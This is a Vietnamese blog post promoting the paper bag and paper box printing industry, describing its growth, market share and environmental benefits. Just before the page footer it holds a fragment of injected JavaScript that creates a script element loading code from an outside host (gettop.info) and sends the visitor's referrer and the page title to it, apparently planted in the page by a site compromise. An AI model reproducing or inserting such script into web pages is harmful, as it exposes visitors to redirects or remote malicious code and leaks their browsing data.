In ấn - thiết kế

Điểm nổi bật của ngành in ấn bao bì giấy của Việt Nam trong thời gian qua

Điểm nổi bật của ngành in ấn bao bì giấy của Việt Nam trong thời gian qua

Điểm nổi bật của ngành in ấn bao bì giấy của Việt Nam trong thời gian qua

Đánh giá in sản phẩm

Một khi nhu cầu về hình thức cho sản phẩm của con người dần tăng lên thì thị trường ngành in ấn bao bì giấy cũng có nhiều bước chuyển biến đáng kể. Mặc dù là một nước có sự phát triển còn nhiều hạn chế song nhờ những nỗ lực vươn lên của mình, ngành in ấn của Việt Nam trong thời gian qua cũng đạt được nhiều thành công nhất định, mang lại sự tăng trưởng không chỉ cho ngành mà còn cho cả nền kinh tế nói chung. Trong đó không thể không kể đến vai trò của ngành in túi giấy, in hộp giấy.

In túi giấy, hộp giấy

Theo thống kê của các nhà kinh tế thì sau khi gia nhập thị trường WTO, ngành in ấn bao bì giấy đã chiếm 45{734382cb2d75c8d7b1ec1d8ba5586710cb984dec5ba9b1e3d108c4f601277519} tỉ trọng trong ngành in ấn nói chung, chứng tỏ được thị hiếu của người tiêu dùng cũng như chất lượng, thẩm mỹ bắt mắt giữ chân được khách hàng theo thời gian. Vì phần lớn túi giấy, hộp giấy được sản xuất từ nguyên liệu gỗ thiên nhiên, vừa an toàn với sức khỏe con người lại thân thiện với môi trường tự nhiên nên có thể hiểu tại sao chúng lại được ưa chuộng đến vậy. Điều này làm cho lĩnh vực in hộp giấy, in túi giấy cũng trên đà phát triển theo.

Với những nhà làm marketing, in hộp giấy, in túi giấy vô cùng quan trọng trong việc đưa hình ảnh, thương hiệu của các doanh nghiệp lẫn sản phẩm đến gần hơn với người tiêu dùng. Một khi hình thức quảng cáo thông qua in túi giấy, in hộp giấy đạt hiệu quả thì hiệu ứng viral của chúng cũng nâng lên đáng kể. Về lâu dài, những sản phẩm tiếp theo của doanh nghiệp cũng sẽ được đón nhận không kém bởi uy tín thương hiệu đã được xây dựng.

Nguyên liệu để sản xuất túi giấy, hộp giấy là gỗ nên chúng không ảnh hưởng xấu cho người sử dụng trong thời gian dài như các loại bao bì khác. Và mặc dù khi in túi giấy, in hộp giấy sẽ có một lớp mực in thấm lên chúng nhưng vì được cấu tạo chống thấm bên trong, lớp mực này sẽ không có cơ hội “lây lan” đến sản phẩm, nên người sử dụng có thể yên tâm về chất lượng.

Mặc dù thị trường in ấn bao bì giấy có nhiều bước chuyển mới song nếu xét theo khu vực thì chúng cũng chỉ được đẩy mạnh ở một số nơi nhất đinh so với địa bàn cả nước như in túi giấy TPHCM, in hộp giấy TPHCM và các khu vực lân cận thuộc khu vực phía Nam, khi mà nguồn vốn đầu tư từ trong nước và nước ngoài đều tập trung tại đây. Điều này vừa mang đến cả cơ hội lẫn thách thức trong tương lai đến các doanh nghiệp in túi giấy, in hộp giấy để làm thế nào phát triển hơn nữa ở giai đoạn kế tiếp. Và chúng ta có thể tin tưởng về một sự thắng lợi vào ngày mai cho ngành in ấn bao bì giấy dựa vào những gì mà ngành đã làm được trong thời gian qua.

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Posted in: Thông tin in ấn

Leave a Comment (0) ↓